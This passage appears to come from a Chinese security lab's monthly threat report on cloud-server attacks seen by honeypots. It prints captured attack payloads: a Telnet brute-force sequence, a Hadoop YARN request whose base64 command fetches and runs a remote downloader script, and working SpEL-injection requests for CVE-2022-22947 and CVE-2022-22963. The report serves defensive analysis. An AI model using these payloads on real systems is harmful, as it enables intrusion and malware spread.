&#x7684;&#x963F;&#x91CC;&#x4E91;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x5C5E;&#x4E8E;***&#x8054;&#x7EDC;&#x5904;&#xFF0C;&#x8BBF;&#x95EE;&#x5BF9;&#x5E94;&#x57DF;&#x540D;&#x53EF;&#x8FDB;&#x5165;&#x8BE5;&#x5355;&#x4F4D;**&#x5E73;&#x53F0;&#xFF0C;&#x5176;IP&#x5728;3&#x6708;&#x4E0A;&#x65EC;&#x5BF9;&#x871C;&#x7F50;&#x8282;&#x70B9;&#x5B58;&#x5728;Telnet&#x66B4;&#x529B;&#x7834;&#x89E3;&#x884C;&#x4E3A;&#xFF1A;</p><pre><code>&#xFFFD;&#xFFFD;telnetadmin
telnetadmin
enable
system
shell
sh
/bin/busybox IZ1H9
</code></pre><p>&#x6848;&#x4F8B;2&#xFF1A;&#x4F4D;&#x4E8E;&#x4E0A;&#x6D77;&#x7684;IP&#x5730;&#x5740;&#x4E3A;118.89.*.*&#x7684;&#x817E;&#x8BAF;&#x4E91;IP&#x5C5E;&#x4E8E;***&#x529E;&#x516C;&#x5BA4;&#xFF0C;&#x8BE5;IP&#x6709;Apache Tomcat&#x66B4;&#x529B;&#x7834;&#x89E3;,ThinkPHP&#x6F0F;&#x6D1E;, Hadoop YARN ResourceManager&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE;&#x6F0F;&#x6D1E;&#x7B49;5&#x4E2A;&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x6216;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x7684;&#x6076;&#x610F;&#x884C;&#x4E3A;&#xFF0C;&#x5E76;&#x4F20;&#x64AD;&#x4E86;TrojanDownloader&#x7C7B;&#x7684;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#xFF0C;&#x4EE5;Hadoop YARN ResourceManager&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE;&#x6F0F;&#x6D1E;&#x4E3A;&#x4F8B;&#xFF0C;&#x653B;&#x51FB;Payload&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p><pre><code>POST /ws/v1/cluster/apps HTTP/1.1
Host: {target}:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Content-Length: 3742
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

{
    &quot;application-id&quot;: &quot;application_1526990652950_72948&quot;,
    &quot;application-name&quot;: &quot;i24jndw5&quot;,
	&quot;am-container-spec&quot;: { &quot;commands&quot;: { &quot;command&quot;: &quot;echo Yz1odHRwOi8vMTk0LjE0NS4yMjcuMjEvbGRyLnNoP2Y5ZWRhYQpleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KZm9yIGkgaW4gMSAxIDEgMSAxIDEgMSAxIDEgMSAxIDEgMSAxIDEgMSAxIDEgMTtkbyBwcyAtZWZ8Z3JlcCAtdiBmYzZifGdyZXAgJ2ZjNmJcfGVwIGN1clx8ZXAgd2dlXHxlcCBpbXAnfGF3ayAne3ByaW50ICQzfSd8eGFyZ3MgLUkgJSBraWxsIC05ICU7ZG9uZQoKcGtpbGwgLTkgLWYgJ3NvXC50eHQnCnBraWxsIC05IC1mICdiYXNoIC1zIDM2NzMnCnBraWxsIC05IC1mIDgwMDUvY2M1CnBraWxsIC05IC1mIHJlYWRka2sKcGtpbGwgLTkgLWYgJ2ZsdWVuY2UvaW5zdGFsbFwuc2gnCnBraWxsIC05IHJlYWRkaQpwa2lsbCAtOSBsYWJraWxsCnBraWxsIC05IGp1aWNlU1NICnBraWxsIC05IHBvc3RncmVzd2sKcGtpbGwgLTkgcG9sc2thCnBraWxsIC05IC1mICdcLi9cLicKcGtpbGwgLTkgLWYgJy90bXAvXC4nCnBraWxsIC05IC1mIGtlcm5lbHgKcGtpbGwgLTkgLWYgZ3Jlcy1zeXN0ZW0KcGtpbGwgLTkgLWYgZ3Jlcy1rZXJuZWwKcGtpbGwgLTkgLWYgcGFzdGViaW4KCmZvciBpIGluICQocHMgLWVmIHwgZ3JlcCBhdGxhc3NpYW4gfCBhd2sgJ3twcmludCAkMn0nKTsgZG8KICBpZiBscyAtYWwgL3Byb2MvJGkgfCBncmVwIGV4ZSB8IGdyZXAgImJpbi9wZXJsXHwvZGV2L3NobSI7IHRoZW4KICAgIGtpbGwgLTkgJGkKICBmaQpkb25lCgppZiBbICEgLXggIiQoY29tbWFuZCAtdiBjdXJsKSIgLWEgISAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgY2QgL3RtcCB8fCBjZCAvdmFyL3RtcAogIGNoYXR0ciAtaSBkOyBjaGF0dHIgLWkgZGxyOyBybSAtcmYgZCBkbHIKICBlY2hvIGYwVk1SZ0VCQVFBQUFBQUFBQUFBQUFJQUF3QUJBQUFBSklNRUNEUUFBQURNQXdBQUFBQUFBRFFBSUFBREFDZ0FCUUFFQUFFQUFBQUFBQUFBQUlBRUNBQ0FCQWlyQXdBQXF3TUFBQVVBQUFBQUVBQUFBUUFBQUt3REFBQ3Nrd1FJckpNRUNBQUFBQUFFQUFBQUJnQUFBQUFRQUFCUjVYUmtBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHQUFBQUJBQUFBRldKNVErMlZRZ1B0a1VNRDdaTkVNSGlHTUhnRUFuQ0Q3WkZGTUhoQ0YwSndnblJpY3FKeUlIaUFQOEFBTUhpQ01IZ0dBblFpY3FCNFFBQS93REI2aGpCNlFnSnlnblF3MVdKNVlQc0VQOTFDR29CNkVRQ0FBQ0R4QkRKdzFXSjVZUHNFUDkxQ0dvRzZDOENBQURKdzFXSjVZUHNDUDkxRVA5MURQOTFDR29GNkJjQ0FBREp3MVdKNVlQc0hJdEZDSWxGOUl0RkRJbEYrSXRGRUlsRi9JMUY5RkJxQTJwbTZQQUJBQURKdzFXSjVZUHNDUDkxRVA5MURQOTFDR29FNk5nQkFBREp3MVdKNVlQc0NQOTFFUDkxRFA5MUNHb0Q2TUFCQUFESncxV0o1WVBzSEl0RkNJbEY5SXRGRElsRitJdEZFSWxGL0kxRjlGQnFBV3BtNkprQkFBREp3MVc0ZllNRUNJbmxWMVpUZ2V5c0FBQUE2d0ZBZ0RnQWRmb3RmWU1FQ0ltRlVQLy8vMUJxQW1pRGd3UUlhZ0hvZHYvLy8yb1ZhT01BQUFCb2tRQUFBR2pDQUFBQVpzZEY0QUlBWnNkRjRnQlE2S2IrLy8rRHhCeG8vd0VBQUdoQkFnQUFhSWFEQkFpSlJlVG8rLzcvLzRQRURHb0FhZ0ZxQW9uSDZGci8vLytEeEJDRCtQK0p4blFGZy8vL2RRMkQ3QXhxQWVpci92Ly9nOFFRVUdvUWpVWGdVRmJvMnY3Ly80UEVFSVhBaWNONUhGRDMyMm9CYUlxREJBaHFBZWpuL3YvL2lSd2s2SG4rLy8rRHhCQ0xuVkQvLy85UWc4TVhVMmlNZ3dRSVZ1akcvdi8vZzhRUU9kaDBEWVBzREdvRDZFLysvLytEeEJBeDIxQnFBWTFGODFCVzZMdisvLytEeEJCSWRBMkQ3QXhxQk9ndC92Ly9nOFFRRDc1Rjg4SGpDQW5EZ2ZzS0RRb05kYzlSYUlBQUFBQ05uV0QvLy85VFZ1aUUvdi8vZzhRUWhjQitEbEpRVTFmb1hQNy8vNFBFRU92WWcrd01WdWo5L2YvL2lUd2s2UFg5Ly8rRHhBeHFBV2lwZ3dRSWFnSG9OZjcvLzhjRUpBVUFBQURvdy8zLy80UEVFSTFsOUZ0ZVgxM0RWWW5sWGVscy92Ly9rSkNRVlZkV1U0dHNKQ3lMZkNRb2kzUWtKSXRVSkNDTFRDUWNpMXdrR0l0RUpCVE5nRnRlWDEwOUFmRC8vdytEQVFBQUFNT0Q3QXlKd3ZmYTZBa0FBQUNKRUlQSS80UEVETU80ckpNRUNNTmhiV1EyTkFBakNnQmtiSElBUHdCSFJWUWdMMk4xY213dFlXMWtOalFnU0ZSVVVDOHhMakFOQ2cwS0FDTUFBQUF1YzJoemRISjBZV0lBTG5SbGVIUUFMbkp2WkdGMFlRQXVZbk56QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQXNBQUFBQkFBQUFCZ0FBQUpTQUJBaVVBQUFBNlFJQUFBQUFBQUFBQUFBQUJBQUFBQUFBQUFBUkFBQUFBUUFBQURJQUFBQjlnd1FJZlFNQUFDNEFBQUFBQUFBQUFBQUFBQUVBQUFBQkFBQUFHUUFBQUFnQUFBQURBQUFBckpNRUNLd0RBQUFFQUFBQUFBQUFBQUFBQUFBRUFBQUFBQUFBQUFFQUFBQURBQUFBQUFBQUFBQUFBQUNzQXdBQUhnQUFBQUFBQUFBQUFBQUFBUUFBQUFBQUFBQT18YmFzZTY0IC1kID4gZAogIGNobW9kICt4IGQ7IC4vZHx8Li9kOyBybSAtZiBkOyBjaG1vZCAreCBkbHIKZmkKCihjdXJsICRjfHxjdXJsICRjfHx3Z2V0IC1xIC1PLSAkY3x8Y3VybCAtayAkY3x8Y3VybCAtayAkY3x8d2dldCAtLW5vLWNoZWNrLWNlcnRpZmljYXRlIC1xIC1PLSAkY3x8Li9kbHIgJGN8fC4vZGxyICRjKXxzaAo=|base64 -d|sh&quot; } },
    &quot;application-type&quot;: &quot;YARN&quot;
}</code></pre><h3 id="--2">&#x70ED;&#x95E8;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;</h3><blockquote>2022&#x5E74;3&#x6708;1&#x65E5;&#xFF0C;Spring&#x5382;&#x5546;&#x53D1;&#x5E03;&#x9AD8;&#x5371;&#x6F0F;&#x6D1E;CVE-2022-22947&#xFF0C;&#x53EF;&#x80FD;&#x4F7F;&#x5176;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x53D7;&#x5230;&#x4EE3;&#x7801;&#x6CE8;&#x5165;&#x653B;&#x51FB;&#x3002;&#x540C;&#x6708;24&#x65E5;&#x518D;&#x6B21;&#x516C;&#x5F00;&#x6F0F;&#x6D1E;CVE-2022-22963&#xFF0C;&#x8BE5;&#x6F0F;&#x6D1E;&#x5F71;&#x54CD;JDK 9+&#x4E0A;&#x7684;SpringMV&#x53CA;WebFlux&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x653B;&#x51FB;&#x8005;&#x6B63;&#x5728;&#x5229;&#x7528;&#x8BE5;&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x3002;</blockquote><p><strong>&#xFF08;1&#xFF09;Spring Cloud Gateway &#x8FDC;&#x7A0B;&#x4EE3;&#x7801;&#x6267;&#x884C;&#x6F0F;&#x6D1E;(CVE-2022-22947)</strong></p><!--kg-card-begin: markdown--><p><strong>&#x6F0F;&#x6D1E;&#x4FE1;&#x606F;</strong></p>
<ul>
<li>&#x5F71;&#x54CD;&#x8303;&#x56F4;&#xFF1A;Spring Cloud Gateway 3.1.0&#x3001;3.0.0-3.0.6&#x53CA;&#x4E0D;&#x53D7;&#x652F;&#x6301;&#x7684;&#x65E7;&#x7248;&#x672C;</li>
<li>CVE&#x7F16;&#x53F7;&#xFF1A;CVE-2022-22947</li>
<li>&#x62AB;&#x9732;&#x65E5;&#x671F;&#xFF1A;2022.03.01</li>
<li>CVSS 3.0&#x8BC4;&#x5206;&#xFF1A;10.0</li>
<li>&#x5F71;&#x54CD;&#x8BBE;&#x5907;&#x91CF;&#x7EA7;&#xFF1A;&#x5343;&#x4E07;&#x7EA7;</li>
</ul>
<!--kg-card-end: markdown--><p>&#x4E0B;&#x56FE;&#x4E3A;&#x8BE5;&#x6F0F;&#x6D1E;&#x7684;&#x653B;&#x51FB;&#x6E90;IP&#x4E0E;&#x4F1A;&#x8BDD;&#x6570;&#x91CF;&#x8D8B;&#x52BF;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x653B;&#x51FB;&#x8005;IP&#x7684;&#x6570;&#x91CF;&#x548C;&#x653B;&#x51FB;&#x8005;&#x5C1D;&#x8BD5;&#x5229;&#x7528;&#x8BE5;&#x6F0F;&#x6D1E;&#x7684;&#x6B21;&#x6570;&#x5448;&#x73B0;&#x4E0A;&#x5347;&#x8D8B;&#x52BF;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-37.png" class="kg-image" alt loading="lazy"></figure><p>&#x6F0F;&#x6D1E;&#x8BE6;&#x60C5;&#x53CA;&#x8865;&#x6551;&#x63AA;&#x65BD;<a href="https://tanzu.vmware.com/security/cve-2022-22947?ref=blog.netlab.360.com">&#x70B9;&#x6B64;&#x67E5;&#x770B;</a>&#xFF0C;&#x4EE5;&#x4E0B;&#x662F;&#x8BE5;&#x6F0F;&#x6D1E;&#x7684;&#x6280;&#x672F;&#x7EC6;&#x8282;&#x5206;&#x6790;&#x3002;</p><h4 id="--3">[&#x6F0F;&#x6D1E;&#x8865;&#x4E01;]</h4><p>&#x5728;spring-cloud-gateway-server/src/main/java/org/springframework/ cloud/gateway/support/ShortcutConfigurable.java&#x4E2D;&#xFF0C;&#x5C06;getValue&#x51FD;&#x6570;&#x4E2D;&#x7684;StandardEvaluationContext&#x66FF;&#x6362;&#x4E3A;GatewayEvaluationContext&#x4FEE;&#x590D;SpEL&#x8868;&#x8FBE;&#x5F0F;&#x6CE8;&#x5165;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220408112458040.png" class="kg-image" alt loading="lazy"></figure><h4 id="--4">[&#x6F0F;&#x6D1E;&#x5206;&#x6790;]</h4><p>&#x67E5;&#x770B;&#x51FD;&#x6570;getValue&#x7684;&#x8C03;&#x7528;&#xFF0C;&#x5728;RouteDefinitionLocator&#x51FD;&#x6570;&#x4E2D;&#xFF0C;&#x6839;&#x636E;RouteDefinition&#x63D0;&#x53D6;GatewayFilter&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220408112517737.png" class="kg-image" alt loading="lazy"></figure><p>&#x6839;&#x636E;&#x5B98;&#x65B9;&#x6587;&#x6863;&#xFF0C;&#x901A;&#x8FC7;Actuator API&#x53EF;&#x521B;&#x5EFA;&#x8DEF;&#x7531;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220408112829328.png" class="kg-image" alt loading="lazy"></figure><p>&#x2003;&#x5B9A;&#x4F4D;Actuator&#x7684;&#x63A7;&#x5236;&#x5668;AbstractGatewayControllerEndpoint&#xFF0C;&#x6839;&#x636E;RouteDefinition&#x89E3;&#x6790;&#x6570;&#x636E;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220408112614972.png" class="kg-image" alt loading="lazy"></figure><p>&#x2003;&#x8BBE;&#x7F6E;&#x65AD;&#x70B9;&#xFF0C;&#x53D1;&#x9001;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x6355;&#x83B7;&#x7684;payload&#x6570;&#x636E;&#xFF1A;</p><pre><code>POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  &quot;id&quot;: &quot;hacktest&quot;,
  &quot;filters&quot;: [{
    &quot;name&quot;: &quot;AddResponseHeader&quot;,
    &quot;args&quot;: {
      &quot;name&quot;: &quot;Result&quot;,
      &quot;value&quot;: &quot;#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\&quot;id\&quot;}).getInputStream()))}&quot;
    }
  }],
  &quot;uri&quot;: &quot;http://example.com&quot;
}
</code></pre><p>&#x2003;validateRouteDefinition&#x51FD;&#x6570;&#x8C03;&#x7528;isAvailable&#x51FD;&#x6570;&#x5BF9;name&#x8FDB;&#x884C;&#x6821;&#x9A8C;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220408112631826.png" class="kg-image" alt loading="lazy"></figure><p>&#x2003;&#x52A8;&#x6001;&#x8C03;&#x8BD5;&#x6709;&#x4EE5;&#x4E0B;name&#x7B26;&#x5408;&#x6761;&#x4EF6;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220408112701296.png" class="kg-image" alt loading="lazy"></figure><p>&#x2003;&#x8DEF;&#x7531;&#x521B;&#x5EFA;&#x6210;&#x529F;&#x540E;&#xFF0C;&#x53D1;&#x9001;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x6355;&#x83B7;&#x7684;refresh&#xFF1A;</p><pre><code>POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

</code></pre><p>&#x2003;&#x6210;&#x529F;&#x89E6;&#x53D1;&#x8868;&#x8FBE;&#x5F0F;&#x89E3;&#x6790;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220408112711977.png" class="kg-image" alt loading="lazy"></figure><p><strong>&#xFF08;2&#xFF09;Spring Cloud Function SpEL&#x8868;&#x8FBE;&#x5F0F;&#x8FDC;&#x7A0B;&#x4EE3;&#x7801;&#x6267;&#x884C;&#x6F0F;&#x6D1E;(CVE-2022-22963)</strong></p><!--kg-card-begin: markdown--><p><strong>&#x6F0F;&#x6D1E;&#x4FE1;&#x606F;</strong></p>
<ul>
<li>&#x5F71;&#x54CD;&#x7248;&#x672C;&#xFF1A;3.0.0.RELEASE &lt;= Spring Cloud Function &lt;= 3.2.2</li>
<li>CVE&#x7F16;&#x53F7;&#xFF1A;CVE-2022-22963</li>
<li>&#x62AB;&#x9732;&#x65E5;&#x671F;&#xFF1A;2022.03.24</li>
<li>CVSS3.0&#x8BC4;&#x5206;&#xFF1A;9.8</li>
<li>&#x5F71;&#x54CD;&#x8BBE;&#x5907;&#x91CF;&#x7EA7;&#xFF1A;&#x4E07;&#x7EA7;</li>
</ul>
<!--kg-card-end: markdown--><p>&#x81EA;24&#x65E5;&#x6F0F;&#x6D1E;&#x516C;&#x5E03;&#x540E;&#xFF0C;&#x5DF2;&#x6709;&#x653B;&#x51FB;&#x8005;&#x5C1D;&#x8BD5;&#x5229;&#x7528;&#x6B64;&#x6F0F;&#x6D1E;&#x8FDB;&#x884C;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F20;&#x64AD;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-55.png" class="kg-image" alt loading="lazy"></figure><p>&#x6F0F;&#x6D1E;&#x8BE6;&#x60C5;&#x53CA;&#x8865;&#x6551;&#x63AA;&#x65BD;<a href="https://tanzu.vmware.com/security/cve-2022-22947?ref=blog.netlab.360.com">&#x70B9;&#x6B64;&#x67E5;&#x770B;</a>&#xFF0C;&#x4EE5;&#x4E0B;&#x662F;&#x8BE5;&#x6F0F;&#x6D1E;&#x7684;&#x6280;&#x672F;&#x7EC6;&#x8282;&#x5206;&#x6790;&#x3002;</p><h4 id="--5">[&#x6F0F;&#x6D1E;&#x8865;&#x4E01;]</h4><p>&#x2003;&#x5728;functionFromExpression&#x65B0;&#x589E;bool&#x7C7B;&#x578B;&#x53C2;&#x6570;isViaHeader &#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220407110944549.png" class="kg-image" alt loading="lazy"></figure><p>&#x2003;&#x901A;&#x8FC7;isViaHeader &#x5224;&#x65AD;&#xFF0C;&#x5F53;&#x8BF7;&#x6C42;&#x6570;&#x636E;&#x7684;header&#x5934;&#x5B58;&#x5728;spring.cloud.function.routing-expression&#x5934;&#x65F6;&#xFF0C;&#x8C03;&#x7528;SimpleEvaluationContext&#x51FD;&#x6570;&#x5904;&#x7406;&#xFF0C;SimpleEvaluationContext &#x9488;&#x5BF9;&#x4E0D;&#x9700;&#x8981;SpEL&#x8BED;&#x8A00;&#x8BED;&#x6CD5;&#x7684;&#x5168;&#x90E8;&#x8303;&#x56F4;&#x4E14;&#x53D7;&#x5230;&#x6709;&#x610F;&#x9650;&#x5236;&#x7684;&#x8868;&#x8FBE;&#x5F0F;&#x7C7B;&#x522B;, SpEL&#x65E0;&#x6CD5;&#x8C03;&#x7528;Java&#x7C7B;&#x5BF9;&#x8C61;&#x3001;&#x5F15;&#x7528;bean, &#x4ECE;&#x800C;&#x4FEE;&#x590D;SPEL&#x8868;&#x8FBE;&#x5F0F;&#x6CE8;&#x5165;&#x6F0F;&#x6D1E;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220407110934910.png" class="kg-image" alt loading="lazy"></figure><h4 id="--6">[&#x6F0F;&#x6D1E;&#x5206;&#x6790;]</h4><p>&#x2003;&#x901A;&#x8FC7;RoutingFunction&#x53D1;&#x73B0;&#x4F4D;&#x4E8E;FunctionWebRequestProcessingHelper&#x7684;&#x53EF;&#x7591;&#x8C03;&#x7528;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220407111013999.png" class="kg-image" alt loading="lazy"></figure><p>&#x6839;&#x636E;FunctionWebRequestProcessingHelper.processRequest&#x8C03;&#x7528;&#x60C5;&#x51B5;&#x53D1;&#x73B0;&#xFF0C;FunctionController&#x63A5;&#x53E3;&#x7684;post&#x8BF7;&#x6C42;&#x5B58;&#x5728;&#x8C03;&#x7528;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220407111032526.png" class="kg-image" alt loading="lazy"></figure><p>&#x2003;&#x8BBE;&#x7F6E;&#x65AD;&#x70B9;&#xFF0C;&#x53D1;&#x9001;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x6355;&#x83B7;&#x7684;payload&#x6570;&#x636E;&#xFF1A;</p><pre><code>POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(&quot;calc&quot;)
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

test
</code></pre><p>&#x2003;&#x5728;FunctionWebRequestProcessingHelper.processRequest()&#x51FD;&#x6570;&#x5904;&#x7406;&#x4E2D;&#xFF0C;&#x5224;&#x65AD;request&#x5BF9;&#x5E94;&#x7684;function&#x4E3A;RoutingFunction&#x7C7B;&#x578B;&#x65F6;&#xFF0C;&#x5C06;&#x8FDB;&#x5165;RoutingFunction.apply()&#x5904;&#x7406;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220407111046682.png" class="kg-image" alt loading="lazy"></figure><p>&#x2003;RoutingFunction.apply&#x8C03;&#x7528;route&#x51FD;&#x6570;&#xFF0C;route&#x51FD;&#x6570;&#x4ECE;Header&#x63D0;&#x53D6;spring.cloud.function.routing-expression&#xFF0C;&#x7136;&#x540E;&#x8C03;&#x7528;functionFromExpression&#x51FD;&#x6570;&#x5904;&#x7406;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220407111057525.png" class="kg-image" alt loading="lazy"></figure><p>&#x2003;functionFromExpression&#x51FD;&#x6570;&#x672A;&#x5BF9;request&#x505A;&#x4EFB;&#x4F55;&#x8FC7;&#x6EE4;&#xFF0C;&#x8C03;&#x7528;expression.getvalue()&#x51FD;&#x6570;&#xFF0C;&#x5B58;&#x5728;SpEL&#x8868;&#x8FBE;&#x5F0F;&#x89E3;&#x6790;&#x6F0F;&#x6D1E;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-20220407111110825.png" class="kg-image" alt loading="lazy"></figure><h3 id="--7">&#x4E91;&#x670D;&#x52A1;&#x5668;&#x653B;&#x51FB;&#x603B;&#x4F53;&#x60C5;&#x51B5;</h3><blockquote>&#x4E09;&#x6708;&#x4EFD;&#x5171;&#x76D1;&#x6D4B;&#x5230;&#x5168;&#x7403;&#x8D85;12&#x4F59;&#x4E07;&#x4E2A;&#x4E91;&#x670D;&#x52A1;&#x5668;&#xFF08;&#x6E90;IP&#xFF09;&#x5F02;&#x5E38;&#x8BBF;&#x95EE;&#x871C;&#x7F50;&#x8282;&#x70B9;&#x5E76;&#x4E0E;&#x4E4B;&#x4EA4;&#x4E92;&#xFF0C;&#x5176;&#x4E2D;3&#x4E07;&#x591A;&#x4E2A;IP&#x53D1;&#x751F;&#x6F0F;&#x6D1E;&#x626B;&#x63CF;&#x548C;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#xFF0C;&#x8D85;7000&#x4E2A;IP&#x53D1;&#x751F;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F20;&#x64AD;&#x884C;&#x4E3A;&#xFF0C;&#x8FD1;2&#x4E07;&#x4E2A;IP&#x53D1;&#x751F;&#x5BC6;&#x7801;&#x7206;&#x7834;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#x3002;</blockquote><p>&#x4E09;&#x6708;&#x4EFD;&#x6211;&#x4EEC;&#x901A;&#x8FC7;&#x5BF9;&#x5168;&#x7403;&#x516C;&#x6709;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x7684;&#x76D1;&#x6D4B;&#xFF0C;&#x5171;&#x6355;&#x83B7;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x5A01;&#x80C1;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x8FD1;6200&#x4E07;&#x6B21;&#xFF0C;&#x5176;&#x4E2D;&#x5305;&#x62EC;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;4700&#x4F59;&#x4E07;&#x6B21;&#xFF08;&#x6D89;&#x53CA;3&#x4E07;&#x591A;&#x4E2A;&#x4E91;&#x670D;&#x52A1;&#x5668;&#xFF09;&#xFF0C;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x5171;&#x6D89;&#x53CA;1118&#x4E2A;&#x6F0F;&#x6D1E;&#x3001;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x8FD1;1400&#x4E07;&#x6B21;&#xFF08;&#x6D89;&#x53CA;7000&#x591A;&#x4E2A;&#x4E91;&#x670D;&#x52A1;&#x5668;&#xFF09;&#x3002;</p><p>&#x653B;&#x51FB;&#x6001;&#x52BF;&#x4E3B;&#x8981;&#x805A;&#x7126;&#x5728;&#x9488;&#x5BF9;Web&#x5E94;&#x7528;&#x548C;&#x6570;&#x636E;&#x5E93;&#x7684;&#x653B;&#x51FB;&#x3001;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x7B49;&#xFF0C;&#x653B;&#x51FB;&#x65B9;&#x5F0F;&#x4E3B;&#x8981;&#x4E3A;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x3001;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;/&#x4EE3;&#x7801;&#x6267;&#x884C;&#x7B49;&#xFF0C;&#x5176;&#x4E2D;&#x9700;&#x8981;&#x5173;&#x6CE8;&#x7684;&#x662F;&#x9488;&#x5BF9;IoT&#x8BBE;&#x5907;&#x7684;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x9010;&#x6B65;&#x5448;&#x4E0A;&#x5347;&#x8D8B;&#x52BF;&#xFF0C;&#x6211;&#x4EEC;&#x6355;&#x83B7;&#x5230;&#x9488;&#x5BF9;IoT&#x653B;&#x51FB;&#x7684;&#x653B;&#x51FB;&#x6E90;&#x6570;&#x91CF;&#x8D85;3000&#x4E2A;&#xFF0C;&#x5C1D;&#x8BD5;&#x653B;&#x51FB;&#x7684;&#x4F1A;&#x8BDD;&#x6570;&#x8D85;200&#x4F59;&#x4E07;&#x6B21;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-42.png" class="kg-image" alt 